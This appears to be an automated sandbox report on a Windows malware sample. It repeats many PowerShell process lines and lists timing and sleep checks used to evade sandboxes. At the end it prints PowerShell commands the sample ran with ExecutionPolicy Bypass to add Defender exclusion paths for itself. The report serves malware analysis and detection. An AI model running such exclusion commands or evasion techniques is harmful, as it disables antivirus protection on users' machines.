        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | API/Special instruction interceptor: Address: 4BD2CBD
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | API/Special instruction interceptor: Address: 3742CBD
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | RDTSC instruction interceptor: First address: 4B6912E second address: 4B6912E instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FE748CFC565h 0x0000000a test bh, ch 0x0000000c jmp 00007FE748CFC811h 0x00000011 test dl, bl 0x00000013 inc ebp 0x00000014 inc ebx 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | RDTSC instruction interceptor: First address: 36D912E second address: 36D912E instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FE7490296F5h 0x0000000a test bh, ch 0x0000000c jmp 00007FE7490299A1h 0x00000011 test dl, bl 0x00000013 inc ebp 0x00000014 inc ebx 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Memory allocated: 110000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Memory allocated: 345A0000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Memory allocated: 365A0000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Window / User API: threadDelayed 2610
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Window / User API: threadDelayed 7209
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7530
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2169
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7466
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2248
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8028
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1657
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsg9061.tmp\System.dll
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | API coverage: 2.0 %
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe TID: 2216 | Thread sleep count: 36 > 30
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe TID: 2216 | Thread sleep time: -33204139332677172s >= -30000s
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe TID: 2264 | Thread sleep count: 2610 > 30
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe TID: 2264 | Thread sleep count: 7209 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5816 | Thread sleep time: -6456360425798339s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8096 | Thread sleep count: 7466 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1836 | Thread sleep count: 2248 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6124 | Thread sleep time: -4611686018427385s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3208 | Thread sleep count: 8028 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3208 | Thread sleep count: 1657 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1956 | Thread sleep time: -4611686018427385s >= -30000s
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | File Volume queried: C:\ FullSizeInformation
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Code function: 0_2_004065DA FindFirstFileW,FindClose
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Code function: 0_2_00402868 FindFirstFileW
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Code function: 3_2_00402868 FindFirstFileW
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Code function: 3_2_004065DA FindFirstFileW,FindClose
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Code function: 3_2_004059A9 DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
        Source: yVVZdG2NJX.exe, 00000003.00000002.2589172205.000000000429C000.00000004.00000020.00020000.00000000.sdmp, yVVZdG2NJX.exe, 00000003.00000002.2589172205.0000000004248000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | API call chain: ExitProcess graph end node (graph_0-4314)
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | API call chain: ExitProcess graph end node (graph_0-4468)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Code function: 0_2_00404243 LdrInitializeThunk,SendMessageW
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Code function: 0_2_703D1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Memory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe'
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yVVZdG2NJX.exe'
